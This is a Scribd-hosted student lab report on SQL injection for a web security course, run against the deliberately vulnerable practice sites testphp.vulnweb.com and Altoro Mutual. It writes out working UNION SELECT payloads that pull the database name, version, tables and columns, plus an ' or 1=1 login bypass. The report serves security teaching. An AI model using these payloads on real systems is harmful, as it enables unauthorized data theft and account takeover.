Scribd
Upload
76 views8 pages

Exp1.4 WMS

1. The document describes an experiment on SQL injection attacks. 2. The student tested SQL injection on two websites - testphp.vulnweb.com and the Altoro Mutual Bank login page. 3. Various SQL commands were used to extract information like the database name, table names, and directly access a user account to demonstrate how SQL injection works.

Uploaded by

Aaditya Ranjan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
76 views8 pages

Exp1.4 WMS

1. The document describes an experiment on SQL injection attacks. 2. The student tested SQL injection on two websites - testphp.vulnweb.com and the Altoro Mutual Bank login page. 3. Various SQL commands were used to extract information like the database name, table names, and directly access a user account to demonstrate how SQL injection works.

Uploaded by

Aaditya Ranjan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

DEPARTMENT OF

COMPUTER SCIENCE & ENGINEERING

Student Name: Kushagra UID: 20BCS1622


Branch: CSE Section/Group: 20BCS_WM_605-B
Semester: 5th Subject Code: 20-CSP-338

Subject Name: Web and Mobile Security


Sr. Program Date Evaluation Sign
No LW VV FW Tota
(12) (10) (8) l
(30)
1. To analyze HTTP Traffic.

2. To test HTML and XSS injection.

3. Working of CSRF Vulnerability.

4. Working of SQL Injection Attack


DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING

Experiment Number: “04”

Student Name: KUSHAGRA UID: 20BCS1622


Branch: CSE Section/Group: 20BCS_WM_605-B
Semester: 5th Subject: Web and Mobile Security Lab

1. Aim/Overview of the practical: Working of SQL Injection Attack.

2. Objective: To understand and test whether a site is vulnerable for SQL


Injection.

3. Tools Used:

• Acunetix acuart page.


• Altoro Mutual Bank Login page.
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING

4. Steps Involved:
1. First of all visit the page testphp.vulnweb.com.
2. Now use the following commands and see for the output:
• Go to- http://testphp.vulnweb.com/listproducts.php?cat=1
• Put the random number, cheat code -
http://testphp.vulnweb.com/listproducts.php?cat=-1 order by clause to check the row
(tuple).
• Information gathering-
• To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,database()--
• To check the database version ,Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,version()—
• Information to be fetch-
• Table name- http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20i
nformation_schema.tables%20where%20table_schema=database()--
• Column name- http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%
20information_schema.columns%20where%20table_name=0x7573657273
3. Now, for Direct access to a user’s account we implement Sql Direct Access Injection.
So, in order to perform that, visit the site of Altoro Mutual Bank Login.
4. Now, in place of user id put: “ ‘ or 1=1--+ ” and choose any password according to
your choice.
5. “Boom”, we get the direct entry into the user’s account verified by the side of server.
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING

OUTPUT:

ACUNETIX ACUART:
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING

ALTORO MUTUAL:
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING

Learning Outcomes:
• We learnt about the vulnerabilities of any particular site on its server.
• Learnt how does a SQL Injection attack works.

You might also like